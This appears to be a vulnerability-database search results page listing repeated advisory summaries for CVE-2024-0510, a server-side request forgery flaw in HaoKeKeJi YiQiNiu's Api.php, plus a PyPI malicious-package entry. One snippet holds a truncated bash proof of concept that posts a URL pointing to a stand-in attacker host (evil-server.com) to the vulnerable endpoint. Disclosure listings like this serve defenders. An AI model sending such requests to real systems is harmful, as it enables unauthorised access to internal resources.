9 matches found
EUVD-2024-16305
Malicious code in bioql PyPI...
CVE-2024-0510
A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function httppost of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched...
HaoKeKeJi YiQiNiu Server Side Request Forgery Vulnerability
!/bin/bash Set target URL and payload targeturl="http://example.com/application/pay/controller/Api.php" payload="url=http://evil-server.com/exploit" Send the malicious request response=$curl -s -X POST -d "$payload" "$targeturl" Check if the exploit was successful if echo "$response" | grep -q...
CVE-2024-0510
A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function httppost of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched...
Server side request forgery (ssrf)
A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function httppost of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched...
CVE-2024-0510 HaoKeKeJi YiQiNiu Api.php http_post server-side request forgery
A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function httppost of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched...
CVE-2024-0510
The CVE-2024-0510 issue affects HaoKeKeJi YiQiNiu up to version 3.1, specifically the http_post function in /application/pay/controller/Api.php. The root cause is improper handling of the url parameter, enabling server-side request forgery (SSRF). The vulnerability can be triggered remotely and h...
CVE-2024-0510 HaoKeKeJi YiQiNiu Api.php http_post server-side request forgery
A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function httppost of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched...
HaoKeKeJi YiQiNiu Code Issue Vulnerability
HaoKeKeJi YiQiNiu is an application from HaoKeKeJi. A code issue vulnerability exists in HaoKeKeJi YiQiNiu version 3.1 and prior versions, which stems from a cross-site request forgery vulnerability in the httppost function of the /application/pay/controller/Api.php file...